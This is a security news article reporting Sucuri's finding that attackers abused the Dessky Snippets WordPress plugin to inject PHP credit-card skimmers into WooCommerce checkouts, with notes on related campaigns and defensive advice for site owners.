WordPress plugin used to steal credit card information from e-commerce sites

May 28, 2024NewsroomData Protection / Skimming

Unknown threat actors are using lesser-known WordPress snippet plugins to insert malicious PHP code into victim sites that can collect credit card information.

The campaign that Sucuri observed on May 11, 2024, involves the abuse of a WordPress plugin called Dessky Snippets, which allows users to add their own PHP code. It has over 200 active installations.

Such attacks have been known to exploit known WordPress plugin flaws or easily guessed credentials to gain root access and install other plugins (legitimate or otherwise) for later exploitation.

Sucuri said the Dessky Snippets plugin is used to inject server-side PHP malware that scans credit cards onto compromised sites and steals financial data.

“This malicious code was stored in the dnsp_settings option in the WordPress wp_options table and was intended to modify the WooCommerce checkout process by manipulating the checkout form and injecting custom code,” said security researcher Ben Martin.

Specifically, it aims to add several new fields to the billing form that require credit card information, including names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers, which are then extracted into the “hxxps” URL: //2of(.)cc/wp-content/.”

A noteworthy aspect of the campaign is that the billing form associated with the fake overlay has its autofill attribute disabled (i.e. autofill=”off”).

“Manually disabling this feature on a fake transaction form reduces the likelihood that the browser will warn the user about entering sensitive information and ensures that fields remain blank until the user manually fills them in, which reduces suspicion and makes the fields seem like regular, necessary ones transaction inputs,” Martin said.

This is not the first time that cybercriminals have resorted to using legitimate snippet plugins for malicious purposes. Last month, the company exposed the abuse of the WPCode snippet plugin to inject malicious JavaScript code into WordPress sites to redirect site visitors to VexTrio domains.

Another malware campaign called Sign1 was discovered to have infected over 39,000 WordPress sites over the past six months, using malicious JavaScript injection via the Simple Custom CSS and JS plugin to redirect users to fraudulent sites.

WordPress site owners, especially those offering e-commerce functionality, are advised to keep their sites and plugins up to date, use strong passwords to prevent brute-force attacks, and regularly check their sites for signs of malware or any unauthorized changes.